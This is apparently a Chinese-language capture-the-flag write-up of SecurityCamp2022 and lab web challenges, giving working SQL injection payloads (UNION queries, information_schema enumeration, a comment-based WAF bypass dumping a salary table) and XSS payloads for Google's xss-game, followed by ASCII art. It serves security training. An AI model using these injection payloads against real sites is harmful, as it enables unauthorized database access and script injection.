CTF平台 - SecurityCamp2022 Web 高階

[toc] # CTF平台 - SecurityCamp2022 Web 高階 --- - 隊伍名稱 : TYC4D - 解題佐證 ![](https://i.imgur.com/s1eSE59.png) ## SQLi-1 右上角可以進行ID之查詢使用註解發現都會出現SQL Error 所以推測是單純Numeric 注入攻擊 ### 過程 1. 進行 or 1=1 試試看 2. 進行 order by 測深度 3. 還不知道table名稱以及colunm名稱利用information.schema查出 4. DB - myDb 5. table - secret 6. colunm - id THIS_IS_FLAG ```SQL= UNION SELECT null,column_name,null FROM information_schema.columns where table_name='secret'``` 5. 最後選出 ```SQL= union select null,id,THIS_IS_FLAG from secret ``` ### 佐證 ![](https://i.imgur.com/6sHpIAU.png) ## SQLi-2 看完註解程式碼發現 - 選出來的資料進行判斷是否和資料庫一樣 - 是以array為單位 - 沒有使用WAF ![](https://i.imgur.com/09gXETO.png) ### 過程決定進行UNION INJECTION 將密碼改為自訂的 1337 帳號欄位填入下列語法，密碼則為1337 即可在第二次檢查拿到FLAG ```SQL= ' or 1=1 union select username,1337 from ctfuser-- ``` ### 佐證 ![](https://i.imgur.com/V8KxDLm.png) # FEIFEI LAB平台 - 隊伍名稱 : tyc4d - 解題佐證 : ![](https://i.imgur.com/7W0t3ee.png) ## SQL-ByPassWAF 1. 目前table在 user_data 先看看有沒有需要的資訊 2. 利用註解大法將SQL注入語法空格替換掉 ```SQL= '/**/or/**/'1'='1'/**/union/**/select/**/null,column_name,null/**/FROM/**/information_schema.columns/**/where/**/table_name='user_data ``` ![](https://i.imgur.com/wd1Adou.png) 3. 發現沒有，開始找table ```SQL= '/**/or/**/'1'='1'/**/union/**/select/**/null,table_name,null/**/from/**/information_schema.tables/**/where/**/'1'='1 ``` ![](https://i.imgur.com/jDZGbeW.png) 4. 可能在 user_salary_data ，爆出來看看 ```SQL= '/**/or/**/'1'='1'/**/union/**/select/**/null,column_name,null/**/from/**/information_schema.columns/**/where/**/table_name='user_salary_data ``` 5. 找到salary欄位，選出來看看 ```SQL= '/**/or/**/'1'='1'/**/union/**/select/**/userid,user_name,salary/**/from/**/user_salary_data/**/where/**/user_name='Pedro ``` ![](https://i.imgur.com/q2nVZxe.png) # XSS-GAME https://xss-game.appspot.com/ - 解題佐證 ![](https://i.imgur.com/r8s3IwX.png) ## WriteUp 1. ![](https://i.imgur.com/Hb95484.png) ```javascript= <script>alert(1)</script> ``` 3. ![](https://i.imgur.com/viCl96U.png) ```javascript= <img src="example.com/d.png" onerror=alert(1)> ``` 5. ![](https://i.imgur.com/5sTKSlt.png ```javascript= 1.jpg'><script>alert(1)</script> ``` 6. ![](https://i.imgur.com/PRJZEzj.png) 注入點 ![](https://i.imgur.com/AWxE0tI.png) ```javascript= 1');alert('1 ``` 8. ![](https://i.imgur.com/LWBc7Yp.png) ```javascript= javascript:alert('hi'); ``` ### 外置js注入 / 物件型態 10. ![](https://i.imgur.com/F1bTugQ.png) #### call google ```javascript= www.google.com/jsapi?callback=alert ``` #### data ```javascript= data:text/javascript,alert('exp') ``` -oooo:- omhsoosho` Ndo:``:oh- dms+--+ym: -ymhohdh+` `N/`.s. +: + -- : -- o .. + :: s ..` .:sssso. -- + :syhhyo` ..::::. `odhhyyhdd. :: s .mhhyhhdh. -:...` /dhhhhhhs .odddhyhdddh+y: my-syhdhhyhhddy/` .odhyyhh: yNdhyyoyhmo+::+ms/+++//++/odm: NNmNd+///+++/+ody::omhyssyhdm- -sddyyyyyyyoommmmmmdhyyyyyyhddd: `ddmdmdhyssyyhhmmNNNNdhyyyyyhmo-` ``-omdyyyssys///shdddddddddmmdddhyy-``yhddddhhhhhdmmmmmmdd/oyssyyyyhmhss-` `:ohhdmddhhyyyyyshddddhhyyyyyhddhhyo:-...--shhyysssyyhhdhhhddyyysyyyhdddmNNmyo. /hNNmmd/:o+/////:`/osyhhyyys+syyhhyysysooossyyyyyooyyyyyyysyy+./oooooos/:ydNNmNmo. +dNmmmmmhoo+///////oossshhyyyyyyyyssoossoosoosssyyyyyyyhsoyyyys/:-..--:/+sdddmmmNMy `hNmmdmmdmddddhhhyhysso+.oyssssso-./o:-/+oo++oo--osoooooo..oyyhyyyyyyhhhyhdddmmdmNNN `yNmNNhhdmdddhhhyyyyyyys:-......`./+++/:o++oo++/-````..::/+sysysyyyhsshhhydddmmmNNNN sMNNNNNNmmdmdhhhhyyyyyyhhssssoo+oo/+//:/+//+:++++ooosyooyssosyyhhyhsshdhdmmNmNmmMMN -NNNNNNhmNmdmmmdddddmhhhyyyyssys///+/:://////o+osoo+osoossosyhhdddh+omddmNNmmNmNMMN oMNNNNNNNNdydNmmmmmdhydhhsoooodhydhsshys+soyooooosssyhyhymdhdhyddmmmdmNNNNNNmNNNMMM yMMNNNMmmNdmmNNNNNNmh/sysyysyhyddmhhyhyhhddyyyhmddhhdmdddmmmdmmmmNNmmmNmNNNNmMNMMMM .dMMNNMMNNNmNNNNNNmmNNhsddddNNdmhdmddyyhdhdhdddhdmhhdddhmddmmmNNNNNNNNNNNNNNNNMNMMMM :NMMMNMMNMNhhmNNNNmdmNNmhddmdNmmmmmmddddNmdhdhddddmddmmmmmmNdNmdmmNNNmNNNNNdmMMMMMMM -mMMMMMNNmNNmNNNNNNNNNNNdmmNmNmNmNmmNNmmNNdhddmmmmNmhhhyohNMNMNmmmmNdmNNMMMNNMMMMMMM .dMMMMMMNNNMMMMMNNNNNMNmmmNNNmmmmNNdddmmNNNmmdNNmNNNmmNNNNNNNNNNNNNNNmNNNNNmNMMMMMMM :NMMMMMMMMMMMMMMMNmmNMNNNNNNNmmNmNNNNmdmNNNNNNNmNNdmNNMMNMmNNNNNNMMNdmNNNMNmmMMMMMMM :NNMMMMMMMMMMMMMMMMNNMNNMNNNMMMNNNNNNmNmdmmmNNNNNNmmNNNNNNNNNNMNNMMMNNNNMMNmMMMMNNMN :NMMMNNMMMMMMMMMMMMMNNMMMMNMMMNmNNMNNNNNmhNMNNMNNNMMNMMMMMNNMMNNNMNMMMMNMMNNMMNMNMMM `hMMMNdMNNMNNNNNMMNNNNMMMMMMMMNmNMMMMNNNNNNNdmmmMNMMMMMMNNMMNmdNMMNMNNNNMNmmNMNMMMMN yMMMMNMMNMNmmNNNMNmddmMMNNNMNNNNNMMNNNNMNNNNNNNmNNNNNNNNNNNNNddNdmdmmNNMNNdMMMMMMMN yMMMMNMNMMNNMMNNNNmdmmNMNNdhmMNNNNNNmNMMddddmNNNmNNMMNmNmmmmmNNmmmmNMMMMMMNNNMMMMMN yNNNMMNNMMMMMMNNNNNMmmdNNNNNNNNNNNNmNNNNNmNmmNNNNNNNNNNNmNmNNNNNNNNNNNNNMMMNNMMMMMy +MMMMMMMMMMMNNNNMMMNNNNmNNNMNMNNMNNmhdNNNNNmNNNmmNNNNNNNNNNNMMNNmNNNNNMNMNMMMMMMMN: NMMMMNMMMMMMMNNNNNNdNMNNNNNNmNNNNNNNNNmmhNNNNmdNNNNNNNNNMMNNMNNNNNNNNNMMMMNNMMMNs` -sdmNMNNMMMMMNNNNmmmmNNNMNmNMNNNNNNNMNmNNNNNNmmmdmNNNMNmmmmNMNNMNMmmNNMMMNMNmd+-` `.ohNNMMNMMNMNNmdmNNNNNNmNMNNMNNNNmNNNmmmNmNMMNNMNNMMNNNNNNNNNNMMMMMMMNNho.` :+hdNNNNNNNNNNNNNNmNNNNNNNMNNNmNNNNmMmmmNNNMNNNNNNNNMNNMMMMMNNmdds/- `--:+shddmmNmmmmNNNNMNNNMNNNNNNNNNNMMNMMMNNNmNNNMNNNNdh++/-.` `--++osdddddddysNmmhshmmmmmNmddddddho/:++/--- `-.-. .------. ```